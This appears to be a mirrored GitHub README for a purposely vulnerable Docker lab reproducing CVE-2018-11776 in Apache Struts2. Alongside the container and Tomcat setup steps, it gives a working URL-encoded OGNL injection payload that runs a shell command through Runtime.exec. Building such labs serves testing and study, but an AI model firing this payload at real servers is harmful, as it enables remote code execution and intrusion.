GithubHelp home page GithubHelp logo

cve-2018-11776's Introduction

Vulnerable docker container for CVE-2018-11776

# docker pull bhdresh/cve-2018-11776:1.0
# docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

PoC

PoC - 1
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
PoC - 2
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
Result  : This would create a file named 'vulnerable' in /tmp/ directory of docker

Steps to create vulnerable docker container

Create a Dockerfile
FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get upgrade -y
RUN apt-get dist-upgrade -y
RUN apt-get install default-jdk vim net-tools wget -y
EXPOSE 8080
Build a docker
# docker build -t cve-2018-11776 .
Start a docker
# docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
Login to docker
# docker exec -it cve-2018-11776 /bin/bash
Make followinng changes inside docker
Set up Tomcat:
# mkdir ~/sources
# cd ~/sources
# wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
# tar xvzf apache-tomcat-7.0.90.tar.gz
# mv apache-tomcat-7.0.90 /opt/tomcat
Update bashrc with variables:
# vim ~/.bashrc

export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat

# . ~/.bashrc
Add an admin to the Tomact gui:
# vim /opt/tomcat/conf/tomcat-users.xml

<user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />
Start Tomcat server
# $CATALINA_HOME/bin/startup.sh
Upload and deploy a vulnerable Struts2 Showcase through tomcat UI
http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
Restart Tomcat
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
Add a vulnerable redirection action without a namespace:
# vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

  <action name="help">
              <result type="redirectAction">
                      <param name="actionName">date.action</param>
              </result>
  </action>

NOTE: By default, alwaysSelectFullNamespace should be set to True.
Restart Tomcat and check out the Struts2 Showcase page:
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh

http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

Author

@bhdresh

References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057

cve-2018-11776's People

Contributors

bhdresh avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar

Forkers

chosen1 unforeseenocean pentestbr biswajitde 3453-315h gh0st0ne 5l1v3r1

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.